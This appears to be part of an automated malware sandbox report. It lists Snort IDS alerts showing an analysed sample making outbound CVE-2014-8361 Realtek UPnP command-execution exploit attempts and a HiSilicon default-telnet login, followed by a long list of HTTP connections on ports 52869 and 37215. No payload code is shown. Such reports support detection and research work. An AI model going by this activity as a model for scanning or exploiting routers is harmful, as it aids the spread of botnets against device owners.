Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41618 -> 45.43.234.182:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41618 -> 45.43.234.182:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 179.53.226.31:23 -> 192.168.2.23:56506
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44490 -> 45.123.197.160:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48414 -> 185.142.143.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48414 -> 185.142.143.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35798 -> 45.41.85.190:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35798 -> 45.41.85.190:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37830 -> 185.207.92.37:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37830 -> 185.207.92.37:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37836 -> 185.207.92.37:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38886 -> 45.84.89.191:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38886 -> 45.84.89.191:52869
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:56506 -> 179.53.226.31:23

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48170 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53336 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53338 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33960 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58326 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58328 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48550 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50392 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42454
Source: unknown	Network traffic detected: HTTP traffic on port 42462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51452 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 42462
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59298 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37192 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37196 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36908 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36916 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59324 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59326 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50996 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40734 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45380 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45386 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47356 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40742 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60090 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41214 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45954 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45964 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41214 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33464 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38296 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38300 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37024 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 37024
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58860 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41804 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40736 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52484 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40738 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60812 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41214 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60558 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60560 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32936 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32922 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39398 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57462 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41784 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50686 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36906 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32982 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 32988 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39210 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49584 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59592 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55476 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55482 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58368 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58374 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39358 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43892 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42874 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33472 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38508 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56620 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56624 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34758 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33442 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50376 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59592 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40706 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41214 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47080 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52172 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34758 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35208 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40470 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37872 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48318 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58882 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34758 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48310 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53152 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36052 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42400 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37256 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53370 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46856 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52682 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45640 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59422 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59426 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59764 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42382 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57564 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59842 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53042 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38790 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 38790
Source: unknown	Network traffic detected: HTTP traffic on port 57186 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57180
